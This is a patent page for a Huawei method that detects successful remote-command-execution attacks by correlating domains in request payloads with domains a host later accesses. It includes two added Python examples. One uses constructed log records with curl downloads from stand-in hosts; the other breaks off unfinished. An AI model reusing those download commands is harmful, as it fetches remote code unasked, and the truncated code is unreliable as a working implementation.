WO2023216792A1 - Attack detection method, and apparatus - Google Patents

Attack detection method, and apparatus

Info

Publication number
WO2023216792A1
Authority
WO
WIPO (PCT)
Prior art keywords
host
domain name
log
request message
detection device
Application number
PCT/CN2023/087493
Other languages
French (fr)
Chinese (zh)
Inventor
杨浩鹏
王飞跃
Original Assignee
华为技术有限公司
Application filed by 华为技术有限公司
Publication of WO2023216792A1


Classifications

    • H ELECTRICITY
      • H04 ELECTRIC COMMUNICATION TECHNIQUE
        • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
          • H04L 9/00 Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
            • H04L 9/40 Network security protocols
          • H04L 43/00 Arrangements for monitoring or testing data switching networks
            • H04L 43/04 Processing captured monitoring data, e.g. for logfile generation
          • H04L 63/00 Network architectures or network communication protocols for network security
            • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
              • H04L 63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
                • H04L 63/1416 Event detection, e.g. attack signature detection
                • H04L 63/1425 Traffic logging, e.g. anomaly detection
              • H04L 63/1433 Vulnerability analysis

Definitions

  • the present application relates to the field of information security, and in particular to a method and device for detecting attacks.
  • Attackers usually use vulnerabilities to invade hosts. Some vulnerabilities allow attackers to directly execute system commands on the host. They are highly harmful vulnerabilities and are widely exploited by attackers. Such vulnerabilities include, for example, Remote Command Execution (RCE) vulnerabilities.
  • RCE Remote Command Execution
  • Traditional technology manually analyzes the characteristics of vulnerabilities, writes corresponding detection rules, and configures the detection rules on security devices such as firewalls. The security device matches the characteristics of the traffic flowing through based on the detection rules. If there is a match, an alarm is generated to indicate that an attack event has occurred.
  • the embodiments of this application provide a method and device for detecting attacks, which can accurately detect attacks based on specific types of vulnerabilities.
  • embodiments of the present application provide a method for detecting attacks, which method is applied to detection equipment.
  • the detection device obtains the network log of the host and the host log of the host, wherein the network log of the host includes parameter information of the first request message, and the first request message is received by the host.
  • the parameter information of the first request message includes the first domain name included in the payload part of the first request message.
  • the host log of the host includes at least one domain name accessed by the host. After acquiring the network log of the host and the host log of the host, the detection device matches the first domain name included in the network log with at least one domain name in the host log.
  • If the at least one domain name in the host log includes the first domain name in the network log, it means that the host has received the first request message including the first domain name and the host has accessed the first domain name. In this case, it is considered that the host accessed the first domain name in the first request message because of the first request message. In other words, this situation indicates that the host has a vulnerability that the attacker tried to exploit through the first request message (such a vulnerability allows the attacker to directly execute system commands on the host), and the attacker's attack targeting the vulnerability succeeded. In this case, the detection device generates alarm information indicating that the host is attacked.
  • this solution combines the first domain name included in the first request message and at least one domain name accessed by the host to determine whether the attack on the host is successful, and only generates alarm information when the attack is successfully executed.
  • If the at least one domain name in the host log does not include the first domain name included in the network log, it means that although the attacker tried to exploit the vulnerability to launch an attack, the attack did not succeed. In this case, no alarm is generated. Therefore, this solution can accurately detect attacks against hosts and avoid generating a large number of false alarms.
  • the parameter information of the first request message also includes the time when the host receives the first request message.
  • the host log of the host also includes the time corresponding to each domain name in the at least one domain name, wherein the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
  • the detection device can determine more information related to the first request message based on the host's network log, and the detection device can determine the time when the host accesses the at least one domain name based on the host's host log.
  • when the network log received by the detection device includes the time when the host receives the first request message, the host log received by the detection device includes the time corresponding to each of the at least one domain name.
  • if the at least one domain name includes the first domain name, the detection device determines whether the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message. If so, it means that the host received the first request message first and then accessed the first domain name. At this time, it is confirmed that the host is attacked; specifically, it is determined that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.
  • after the detection device determines that the at least one domain name includes the first domain name and that the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, it further determines whether the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold.
  • when the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to the preset time threshold, the detection device determines that the host is attacked; specifically, it determines that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.
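The correlation the method describes (a domain name carried in a received request message, later accessed by the host, within a preset time threshold) as an added worked example in Python; it is not code from the patent, and the host IP, timestamps and log records are constructed.

```python
"""Added example (not from the patent): correlate a host's network log with
its host log and raise an alarm only when the domain name carried in a
received request message is accessed by the host afterwards, within a preset
time threshold. A request whose domain is never accessed stays silent."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class NetLogEntry:
    """Parameter information of one received request message (network log)."""
    received_at: datetime   # time the host received the request message
    domain: str             # the "first domain name" found in the payload
    dst_ip: str             # destination IP address of the request message
    payload: str            # payload part, kept so the alarm can carry it


@dataclass(frozen=True)
class HostLogEntry:
    """One domain name accessed by the host, recorded by the host agent."""
    accessed_at: datetime   # time the host accessed the domain name
    domain: str
    record: str             # log record, e.g. the shell command that ran


@dataclass(frozen=True)
class Alarm:
    host_ip: str
    domain: str
    dst_ip: str
    payload: str
    record: str
    delay: timedelta        # access time minus request time


def normalize(domain: str) -> str:
    """DNS names are case-insensitive; also drop a trailing root dot."""
    return domain.rstrip(".").lower()


def detect(host_ip, net_log, host_log, threshold=timedelta(minutes=5)):
    """One Alarm per request message whose domain the host accessed later than
    the request arrived and no more than `threshold` after it."""
    by_domain = {}
    for h in host_log:
        by_domain.setdefault(normalize(h.domain), []).append(h)
    alarms = []
    for req in net_log:
        candidates = sorted(by_domain.get(normalize(req.domain), []),
                            key=lambda e: e.accessed_at)
        for h in candidates:
            delay = h.accessed_at - req.received_at
            # Strictly later, as the method requires. With one-second log
            # granularity an access in the same second would be missed;
            # relax to timedelta(0) <= delay if your logs need that.
            if timedelta(0) < delay <= threshold:
                alarms.append(Alarm(host_ip, req.domain, req.dst_ip,
                                    req.payload, h.record, delay))
                break   # the first qualifying access is enough for one alarm
    return alarms


def run_sample(threshold_seconds=300):
    """Constructed logs (not real traffic) covering the four outcomes:
    accessed shortly after (alarm), accessed before (no alarm), accessed
    long after (over threshold, no alarm), never accessed (no alarm)."""
    def t(hms):
        return datetime.fromisoformat("2024-01-01T" + hms)
    host_ip = "10.0.0.5"
    net_log = [
        NetLogEntry(t("12:00:00"), "files.example.net", host_ip,
                    "GET /?u=http://files.example.net/x"),
        NetLogEntry(t("12:01:00"), "cdn.example.org", host_ip,
                    "GET /?u=http://cdn.example.org/y"),
        NetLogEntry(t("12:02:00"), "mirror.example.com", host_ip,
                    "GET /?u=http://mirror.example.com/z"),
        NetLogEntry(t("12:03:00"), "nothing.example.com", host_ip,
                    "GET /?u=http://nothing.example.com/w"),
    ]
    host_log = [
        HostLogEntry(t("11:50:00"), "updates.example.com", "apt-get update"),
        HostLogEntry(t("11:59:00"), "cdn.example.org",
                     "curl http://cdn.example.org/y"),
        HostLogEntry(t("12:00:03"), "FILES.example.net.",   # case/root dot
                     "curl http://files.example.net/x"),
        HostLogEntry(t("12:20:00"), "mirror.example.com",
                     "curl http://mirror.example.com/z"),
    ]
    return detect(host_ip, net_log, host_log,
                  timedelta(seconds=threshold_seconds))


if __name__ == "__main__":
    for a in run_sample():
        print(f"ALARM host={a.host_ip} domain={a.domain} "
              f"delay={a.delay} via {a.record!r}")
```

Only the first request produces an alarm at the default five-minute threshold; widening it to 30 minutes also catches the mirror.example.com access, which shows why the threshold is a tuning knob rather than a fixed constant.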
  • the aforementioned detection device is integrated into the host.
  • the detection device obtains the network log of the host, that is, the host obtains its own network log.
  • the host can obtain the network log of the host by hooking a network function.
  • the detection device obtains the host log of the host, that is, the host obtains its own host log.
  • the host obtains its own host logs by hooking the shell execution process in the operating system.
  • the detection device is another independent computer device connected to the host through a network.
  • the specific implementation method for the detection device to obtain the network log of the host is: the detection device receives the network log sent by a security device, where the security device is deployed between the other device and the host.
  • the specific implementation method for the detection device to obtain the host log of the host is: the detection device receives the host log sent by the host.
  • when the detection device is another independent computer device with a network connection to the host, the detection device, the security device and the host are located in the same local area network. In this case, the host and the security device can access the detection device, but other devices outside the local area network cannot access the detection device.
  • the detection device is deployed on the Internet.
  • the host and security devices can access the detection device, and other devices can also access the detection device.
  • after the detection device generates the alarm information, it further outputs the alarm information, so that operation and maintenance personnel or other devices (such as management devices) can determine that the host is attacked and take corresponding processing measures.
  • the alarm information also includes more information related to the first request message.
  • the parameter information of the first request message included in the network log of the host obtained by the detection device also includes the payload part of the first request message and/or the destination IP address of the first request message; in this case, the alarm information also includes the payload part and/or the destination IP address of the first request message included in the parameter information.
  • the host log of the host obtained by the detection device also includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name.
  • the alarm information also includes the IP address of the host included in the host log and/or the log record corresponding to the first domain name.
  • the first request message, such as the attack message, is a transmission control protocol (TCP) based request message.
  • TCP transmission control protocol
  • embodiments of the present application provide a system for detecting attacks.
  • the system includes: a security device, a host, and a detection device; the security device is configured to send network logs of the host to the detection device.
  • the network log includes parameter information of the first request message, the first request message is a message received by the host from other devices, and the parameter information includes the first domain name included in the payload part of the first request message; the host is used to send the host log of the host to the detection device, the host log including at least one domain name accessed by the host; the detection device is used to receive the network log sent by the security device and the host log sent by the host, and, if the at least one domain name includes the first domain name, to generate alarm information, the alarm information being used to indicate that the host is under attack.
  • This solution combines the first domain name included in the first request message and at least one domain name accessed by the host to determine whether the attack on the host is successful, and only generates alarm information when the attack is successfully executed.
  • If the at least one domain name in the host log does not include the first domain name included in the network log, it means that although the attacker tried to exploit the vulnerability to launch an attack, the attack did not succeed. In this case, no alarm is generated. Therefore, this solution can accurately detect attacks against hosts and avoid generating a large number of false alarms.
  • the parameter information also includes the time when the host receives the first request message, and the host log also includes the time corresponding to each domain name in the at least one domain name, wherein, the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
  • the detection device is configured to: generate the alarm information when the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message.
  • the detection device is configured to: generate the alarm information when the at least one domain name includes the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold.
  • the host obtains the host log of the host by hooking a shell execution process in the operating system.
  • the detection device, the security device and the host are located in the same local area network.
  • the detection device is deployed on the Internet.
  • the detection device is further configured to: output the alarm information.
  • the parameter information also includes the payload part and/or the destination Internet protocol (IP) address of the first request message, and the alarm information includes the payload part and/or the destination IP address included in the parameter information.
  • the host log also includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name, and the alarm information includes the IP address of the host and/or the log record corresponding to the first domain name included in the host log.
  • the first request message is a TCP-based request message.
  • embodiments of the present application provide a detection device.
  • the detection device is integrated in a host.
  • the detection device includes: an acquisition module for acquiring network logs of the host.
  • the network log includes parameter information of a first request message, the first request message is a request message received by the host from other devices, and the parameter information includes the first domain name included in the payload part of the first request message;
  • the acquisition module is also configured to acquire the host log of the host, where the host log includes at least one domain name accessed by the host; and a processing module is configured to generate alarm information if the at least one domain name includes the first domain name, the alarm information being used to indicate that the host is under attack.
  • the acquisition module is used to obtain the network log of the host by hooking a network function, and obtain the host log of the host by hooking a shell execution process in the operating system.
  • embodiments of the present application provide a detection device, which is applied to detection equipment.
  • the device includes: an acquisition module, used to acquire network logs of the host, where the network logs include parameter information of the first request message.
  • the first request message is a request message from other devices received by the host, and the parameter information includes the first domain name included in the payload part of the first request message;
  • the acquisition module is also used to obtain the host log of the host, where the host log includes at least one domain name accessed by the host;
  • a processing module is configured to generate alarm information if the at least one domain name includes the first domain name, the alarm information being used to indicate that the host is under attack.
  • the parameter information also includes the time when the host receives the first request message, and the host log also includes the time corresponding to each domain name in the at least one domain name, wherein, the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
  • the processing module is configured to: generate the alarm information if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message.
  • the processing module is configured to: generate the alarm information if the at least one domain name includes the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold.
  • the detection device is integrated into the host, and the acquisition module is used to: obtain the network log of the host by hooking a network function; and obtain the host log of the host by hooking a shell execution process in the operating system.
  • the detection device is another independent computer device that has a network connection with the host.
  • the acquisition module is configured to: receive the network log sent by the security device, the security device being deployed between the other devices and the host; and receive the host log sent by the host.
  • the detection device, the security device and the host are located in the same local area network.
  • the detection device is deployed on the Internet.
  • the processing module is further configured to: output the alarm information.
  • the parameter information also includes the payload part and/or the destination Internet protocol (IP) address of the first request message.
  • the alarm information also includes the payload part and/or the destination IP address included in the parameter information.
  • the host log also includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name.
  • the alarm information also includes the IP address of the host and/or the log record corresponding to the first domain name included in the host log.
  • embodiments of the present application provide a device.
  • the device includes a processor and memory.
  • the memory is used to store instructions or computer programs.
  • the processor is configured to execute the instructions or computer programs in the memory, and perform the method described in any one of the above first aspects.
  • embodiments of the present application provide a computer-readable storage medium, which includes instructions or computer programs that, when run on a computer, cause the computer to perform any of the methods described in the first aspect above.
  • embodiments of the present application provide a computer program product containing instructions or computer programs that, when run on a computer, cause the computer to perform any of the methods described in the first aspect above.
  • Figure 1 is a schematic diagram of the process of launching an attack using a specific category of vulnerabilities in an exemplary application scenario
  • Figure 2a is a schematic diagram of an exemplary application scenario provided by the embodiment of the present application.
  • Figure 2b is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application.
  • Figure 2c is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application.
  • FIG. 3 is a schematic flowchart of an attack detection method provided by an embodiment of the present application.
  • Figure 4 is a signaling interaction diagram of an attack detection method provided by an embodiment of the present application.
  • Figure 5 is a schematic structural diagram of a detection device provided by an embodiment of the present application.
  • Figure 6 is a schematic structural diagram of a device provided by an embodiment of the present application.
  • the embodiments of this application provide a method and device for detecting attacks, which can improve the accuracy of detecting attacks launched by exploiting specific types of vulnerabilities.
  • the specific category of vulnerabilities includes vulnerabilities that allow attackers to directly execute system commands on the host.
  • FIG. 1 is a schematic diagram of the process of launching an attack using a specific category of vulnerabilities.
  • the attacker sends an attack message containing an attack command to the host.
  • the attack command is to download malware stored on domain name A and execute it locally on the host.
  • the attack message is a TCP request message.
  • the vulnerability exploit is triggered.
  • the vulnerable service calls a function in the host's operating system to execute the attack command in the attack message. Further: the operating system sends an access request to domain name A, downloads the malware stored in a file directory of domain name A to the local host, and executes the malware on the host.
  • In response to the attack behavior shown in Figure 1, traditional technology manually analyzes the characteristics of the vulnerability, writes the corresponding detection rules, and configures the detection rules on security devices such as firewalls.
  • the security device matches the characteristics of the traffic flowing through based on the detection rules. If there is a match, an alarm is generated to indicate that an attack event has occurred.
  • the security device is deployed between the attacker and the host. When the attacker sends the attack packet to the host, the security device performs feature matching on the attack packet. Alternatively, the security device is deployed between the host and the device corresponding to domain name A. When the host sends an access request to domain name A, the security device performs feature matching on the access request. Similarly, when a host downloads malware from a file directory in domain name A, the security device performs feature matching on the traffic that includes the malware.
  • if the host receives the attack message but does not execute the attack command in the attack message, the attacker's attack does not succeed.
  • If the security device deployed between the attacker and the host performs feature matching on the passing traffic based on detection rules, an alarm will still be generated because the attack packet is detected, resulting in a false alarm.
  • embodiments of the present application provide a method for detecting attacks, which can more accurately detect attacks launched by attackers against hosts based on the above-mentioned specific categories of vulnerabilities. Moreover, this solution can also reduce false alarms.
  • FIG. 2a is a schematic diagram of an exemplary application scenario provided by the embodiment of the present application.
  • the host 101 is connected to the network through other network devices, and the attack packet sent by the attacker is forwarded to the host 101 through other network devices (such as switches, routers, etc.).
  • a host agent (agent) runs on the host 101, and a network log acquisition module and a host log acquisition module run on the host agent.
  • the host 101 uses the network log acquisition module to acquire network logs of the host, uses the host log acquisition module to acquire host logs of the host, and determines whether the host is attacked based on the network logs and host logs.
  • the host agent is a component running on the host.
  • the host agent is a host intrusion detection system (HIDS) agent.
  • HIDS host intrusion detection system
  • NIDS network intrusion detection system
  • FIG. 2b is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application.
  • the host 102 is connected to the network through the security device 103, and the attack message sent by the attacker is forwarded to the host 102 through the security device 103.
  • one or more network forwarding devices such as routers, security gateways, etc., exist between the attacker and the security device.
  • Host 102 and security device 103 also interact with comprehensive analysis device 104 .
  • a host agent runs on the host 102, and a host log acquisition module runs on the host agent.
  • the host 102 uses the host log acquisition module to acquire the host log of the host 102, and sends the host log to the comprehensive analysis device 104.
  • the security device 103 includes a network log acquisition module.
  • the security device 103 uses the network log acquisition module to obtain the network log of the host 102 and sends the network log to the comprehensive analysis device 104 .
  • the comprehensive analysis device 104 determines whether the host is attacked based on the received network logs and host logs. The host 102, security device 103 and comprehensive analysis device 104 are located in the same local area network.
  • the host 102 and the security device 103 access the comprehensive analysis device 104 through the Internet Protocol (IP) address of the comprehensive analysis device 104, where the IP address of the comprehensive analysis device 104 is pre-configured on the host 102 and the security device 103.
  • IP Internet Protocol
  • since the host 102, security device 103 and comprehensive analysis device 104 are located in the same local area network, other devices outside the local area network cannot access the comprehensive analysis device 104.
  • This application does not specifically limit the protocol used for data interaction between the host 102 and the comprehensive analysis device 104.
  • the protocols used for data exchange between the host 102 and the comprehensive analysis device 104 include but are not limited to: TCP and hypertext transfer protocol (HTTP).
  • HTTP hypertext transfer protocol
  • the protocols used for data exchange between the security device 103 and the comprehensive analysis device 104 include but are not limited to: TCP and HTTP.
  • the data exchanged between the host 102 and the comprehensive analysis device 104 includes the aforementioned host logs, and the data interacted between the security device 103 and the comprehensive analysis device 104 includes the aforementioned network logs.
  • the comprehensive analysis device 104 mentioned here is, for example, a device running extended detection and response (extended detection and response, XDR) software, or a device running security information event management (security information event management, SIEM) software.
  • XDR extended detection and response
  • SIEM security information event management
  • FIG. 2c is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application.
  • the host 102 is connected to the network through the security device 103, and the attack message sent by the attacker is forwarded to the host 102 through the security device 103.
  • Host 102 and security device 103 also interact with cloud analytics device 105 .
  • a host agent runs on the host 102, and a host log acquisition module runs on the host agent.
  • the host 102 uses the host log acquisition module to acquire the host log of the host 102, and sends the host log to the cloud analysis device 105.
  • the security device 103 includes a network log acquisition module.
  • the security device 103 uses the network log acquisition module to obtain the network log of the host 102 and sends the network log to the cloud analysis device 105 .
  • the cloud analysis device 105 determines whether the host is attacked based on the received network logs and host logs.
  • the host 102 and the security device 103 are located in the same local area network, and the cloud analysis device 105 is deployed on the Internet.
  • the cloud analysis device 105 provides a subscription service, and other devices such as the host 102 and the security device 103 access this subscription service through a uniform resource locator (URL), a web application programming interface (API), or a domain name.
  • URL uniform resource locator
  • API web application programming interface
  • This application does not specifically limit the protocol used for data interaction between the host 102 and the cloud analysis device 105.
  • the protocols used for data exchange between the host 102 and the cloud analysis device 105 include but are not limited to: TCP, HTTP, and hypertext transfer protocol over secure socket layer (HTTPS).
  • HTTPS hypertext transfer protocol over secure socket layer
  • the protocols used for data exchange between the security device 103 and the cloud analysis device 105 include but are not limited to: TCP, HTTP, and HTTPS.
  • the data exchanged between the host 102 and the cloud analysis device 105 includes the aforementioned host logs, and the data interacted between the security device 103 and the cloud analysis device 105 includes the aforementioned network logs.
  • FIG 3 is a schematic flowchart of an attack detection method provided by an embodiment of the present application.
  • the method of detecting attacks shown in Figure 3 is executed by a detection device.
  • When the method shown in Figure 3 is applied to the scenario shown in Figure 2a above, the detection device is the host 101 shown in Figure 2a. When the method shown in Figure 3 is applied to the scenario shown in Figure 2b above, the detection device is the comprehensive analysis device 104 shown in Figure 2b. When the method shown in Figure 3 is applied to the scenario shown in Figure 2c above, the detection device is the cloud analysis device 105 shown in Figure 2c.
  • the method shown in Figure 3 includes steps S101-S103.
  • S101: the detection device obtains the network log of the host.
  • the network log includes parameter information of the first request message.
  • the first request message is a request message received by the host from other devices.
  • the parameter information includes the first domain name included in the payload part of the first request message.
  • the detection device is integrated into the host 101.
  • the specific implementation method of S101 is: the host 101 obtains its own network log.
  • the host 101 can obtain the network log by hooking a network function.
  • the host uses the hook mechanism to monitor calls to the network data processing function in the protocol stack function library that handles messages sent and received by the network interface; when that function is called, the host obtains the first request message being processed by it. The host 101 then parses the first request message to obtain its payload, and further parses the payload to obtain the first domain name.
  • the embodiment of this application does not specifically limit how the host 101 parses the first request message to obtain the payload, nor how the host 101 parses the payload to obtain the first domain name.
  • the host 101 parses the first request message according to the message format specified in request for comments (RFC) 793, thereby obtaining the payload of the first request message.
  • the host 101 uses regular expression parsing, according to the definition and constraints of a domain name in RFC 1035, to determine whether a domain name exists in the payload; if it is determined that a domain name exists in the payload, the host extracts the first domain name included in the payload.
  • the embodiments of this application do not specifically limit the aforementioned other devices.
  • the aforementioned other devices may be network devices or user equipment, where user equipment includes but is not limited to terminal equipment and servers.
  • the parameter information of the first request message refers to content extracted from the first request message, or to context information that is obtained when the first request message is received and is related to the first request message.
  • the parameter information of the first request message also includes other information.
  • the parameter information also includes the time when the host receives the first request message.
  • the parameter information further includes the payload part of the first request message and/or the destination IP address of the first request message.
  • the specific implementation of S101 is: receiving the network log sent by the security device 103, where the security device 103 is deployed between the other device and the host, that is, when the other device sends the first request message to the host 102, the message is forwarded by the security device 103.
  • the security device 103 mentioned here includes but is not limited to firewalls and other devices deployed with security protection policies.
  • after obtaining the first request message, the security device 103 obtains the parameter information of the first request message from the first request message, and then sends the parameter information of the first request message to the detection device.
  • the way the security device 103 obtains the parameter information of the first request message from the first request message is similar to the way the host 101 does so. For the details, refer to the above description of the host obtaining the parameter information of the first request message, which is not repeated here.
  • S102: the detection device obtains the host log of the host, where the host log includes at least one domain name accessed by the host.
  • the detection device obtains the host log of the host within a certain period of time.
  • the detection device obtains the host log of the host within a certain period of time after receiving the first request message from the host.
  • the embodiments of this application do not specifically limit the certain time period.
  • the corresponding duration of the certain time period is relatively short.
  • the detection device obtains the host log within 10 seconds after receiving the first request message from the host.
  • the detection device is integrated with the host 101.
  • the specific implementation method of S102 is: the host 101 obtains its own host log.
  • host 101 obtains its own host log by hooking the shell execution process in the operating system.
  • host 101 uses the hook mechanism to monitor the shell execution process in the operating system, thereby obtaining its own shell execution log.
  • regular expression analysis is used to determine whether a domain name is present in each shell execution log record. If one is present, the domain name is saved, thereby obtaining the host log including at least one domain name accessed by the host.
  • the host log includes information related to the host and the domain names accessed by the host.
  • the host log in addition to including the at least one domain name, also includes the time corresponding to each domain name in the at least one domain name.
  • the time corresponding to the second domain name refers to the time when the host accesses the second domain name.
  • the host log further includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name.
  • the specific implementation of S102 is: receiving the host log sent by the host 102.
  • after receiving the first request message, the host 102 performs the step of obtaining the host log to obtain its own host log, and then sends its own host log to the detection device.
  • for the host 102 obtaining the host log, refer to the relevant description of "the host 101 obtains its own host log" in S101, which is not described in detail here.
  • S101 can be executed before S102, S101 can also be executed between S102 and S103, and S101 can also be executed at the same time as S102.
  • S103: if the at least one domain name includes the first domain name, the detection device generates alarm information.
  • the alarm information is used to indicate that the host is under attack.
  • the alarm information indicates that the attack carried out by the first request message is successful.
  • after the detection device obtains the network log and the host log, it matches the first domain name in the network log against the at least one domain name in the host log. If the at least one domain name in the host log includes the first domain name, this means that the host received the first request message including the first domain name and then accessed the first domain name. In this case, it is considered that the host accessed the first domain name in the first request message because of the first request message. Therefore, for this situation, the detection device determines that the host is attacked and generates alarm information indicating that the host is attacked. If the at least one domain name in the host log does not include the first domain name in the network log, this means that although the attacker tried to exploit the vulnerability to launch an attack, the attack did not succeed; in this case, no alarm is generated.
  • after the detection device generates the alarm information, it further outputs the alarm information so that operation and maintenance personnel or other devices (such as management devices) can determine that the host is under attack and take corresponding measures.
  • in one example, the detection device displays the alarm information on a display screen. In another example, the detection device sends the alarm information to other devices such as network management equipment.
  • in order to enable the operation and maintenance personnel or management equipment to learn more about the attack message, the alarm information also includes further information related to the first request message.
  • the parameter information of the first request message included in the network log also includes the payload part of the first request message and/or the destination IP address of the first request message.
  • the alarm information also correspondingly includes the payload part included in the parameter information and/or the destination IP address of the first request message.
  • for example, if the parameter information includes the payload part, the alarm information includes the payload part; if the parameter information includes the destination IP address of the first request message, the alarm information includes the destination IP address of the first request message.
  • the host log further includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name.
  • the alarm information also includes the IP address of the host included in the host log and/or the log record corresponding to the first domain name.
  • for example, if the host log includes the IP address of the host, the alarm information includes the IP address of the host; for another example, if the host log includes log records corresponding to each domain name in the at least one domain name, the alarm information includes the log record corresponding to the first domain name.
  • the network log also includes the time when the host receives the first request message, and the host log also includes the time corresponding to each domain name in the at least one domain name. For this situation, consider that for an attack message, the time when the host receives the attack message is earlier than the time when the host accesses the domain name included in the attack message.
  • in addition to matching the first domain name with the at least one domain name, if the at least one domain name includes the first domain name, the detection device further determines whether the time when the host receives the first request message is earlier than the time when the host accesses the first domain name, that is, whether the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message. If it is later, this means that the host first received the first request message and then accessed the first domain name. At this point it is confirmed that the host is under attack; specifically, it is determined that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.
  • after the detection device determines that the at least one domain name includes the first domain name and that the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, it further determines whether the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold.
  • when that difference is less than or equal to the preset time threshold, the detection device determines that the host is attacked; specifically, it is determined that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.
  • the embodiment of the present application does not specifically limit the preset time threshold.
  • the preset time threshold is a relatively small value, for example, the preset time threshold is 10 seconds.
  • setting the preset time threshold to a relatively small value can also improve the efficiency of detecting attack packets.
  • if attack packets are detected promptly, corresponding processing measures can be taken promptly.
  • if the preset time threshold is set to a longer value, for example 5 hours, then after the host receives the first request message, the first domain name needs to be compared with the domain names accessed by the host within 5 hours; in other words, in some cases it takes up to 5 hours to determine whether the host has been attacked.
  • the attack detection method provided by the embodiment of the present application is used to determine whether the host is attacked by combining the first domain name included in the first request message and at least one domain name accessed by the host.
  • the detection mechanism of this solution is consistent with the attacker's attack mode. Therefore, this solution can accurately detect attacks against hosts.
  • the solution of the embodiment of this application identifies attack messages by combining network logs and host logs; that is, the attack messages identified by this solution are attack messages whose attacks succeeded. Therefore, with this solution, attack packets whose attacks did not succeed do not trigger alarms, which reduces false alarms.
  • FIG 4 is a signaling interaction diagram of an attack detection method provided by an embodiment of the present application.
  • the method for detecting attacks shown in Figure 4 is applied to a system for detecting attacks.
  • the system for detecting attacks includes a host, a security device, and a detection device.
  • the system for detecting attacks is deployed in the network scenario corresponding to Figure 2b, that is, the system for detecting attacks includes: a host 102, a security device 103, and a comprehensive analysis device 104.
  • the system for detecting attacks is deployed in the network scenario corresponding to Figure 2c, that is, the system for detecting attacks includes: a host 102, a security device 103, and a cloud analysis device 105.
  • the method of detecting attacks shown in Figure 4 includes steps S201-S204.
  • S201: the security device sends the network log of the host to the detection device.
  • the network log includes parameter information of the first request message.
  • the first request message is a message received by the host from other devices.
  • the parameter information includes the first domain name included in the payload part of the first request message.
  • S202: the host sends the host log of the host to the detection device, where the host log includes at least one domain name accessed by the host.
  • S203: the detection device receives the network log sent by the security device and the host log sent by the host.
  • S204: when the at least one domain name includes the first domain name, the detection device generates alarm information, and the alarm information is used to indicate that the host is attacked.
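The following Python program is an added example written for this page; it is not code from the patent or from Huawei. It carries steps S101 to S103 of Figure 3 (and the equivalent matching step S204 of the system in Figure 4) end to end: a domain-name pattern built from the RFC 1035 label rules extracts the first domain name from a request payload (S101) and the domain names accessed by the host from shell execution records (S102), and the matching step raises an alarm only when the host accessed a payload domain after the request was received and within the preset time threshold (S103), returning the payload, destination IP, host IP and matching log record that the description says the alarm may carry. All log lines, timestamps, IP addresses and the `.example` domain names are constructed for the example; the data classes, function names and the 10-second default threshold are assumptions, and the matcher checks every domain name found in the payload rather than a single one, which goes slightly beyond the description.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Domain-name pattern built from the RFC 1035 label rules: labels of letters,
# digits and hyphens, 1..63 characters, not starting or ending with a hyphen,
# with an alphabetic top-level label so that IP addresses and version numbers
# such as 1.2.3 are not picked up. Constructed for this example, not the patent's.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
DOMAIN_RE = re.compile(
    rf"(?<![a-z0-9.-])(?:{_LABEL}\.)+[a-z]{{2,63}}(?![a-z0-9-])", re.IGNORECASE
)


@dataclass
class RequestParams:
    """Parameter information of a request message, as carried in the network log (assumed layout)."""
    received_at: datetime   # time the host received the request message
    dst_ip: str             # destination IP address of the request message
    payload: str            # payload part of the request message
    domains: list[str]      # domain names found in the payload (the "first domain name")


@dataclass
class HostAccess:
    """One host-log record: a domain name the host accessed and when (assumed layout)."""
    accessed_at: datetime
    domain: str
    record: str             # the shell execution record the domain was taken from


def extract_domains(text: str) -> list[str]:
    """Return the distinct domain names found in text, lower-cased, in order of appearance."""
    found: list[str] = []
    for m in DOMAIN_RE.finditer(text):
        d = m.group(0).lower()
        if d not in found:
            found.append(d)
    return found


def build_network_log(received_at: datetime, dst_ip: str, payload: str) -> RequestParams:
    """S101: derive the request's parameter information, including the payload domain(s)."""
    return RequestParams(received_at, dst_ip, payload, extract_domains(payload))


def build_host_log(shell_records: list[tuple[datetime, str]]) -> list[HostAccess]:
    """S102: keep only the shell execution records that contain a domain name."""
    host_log: list[HostAccess] = []
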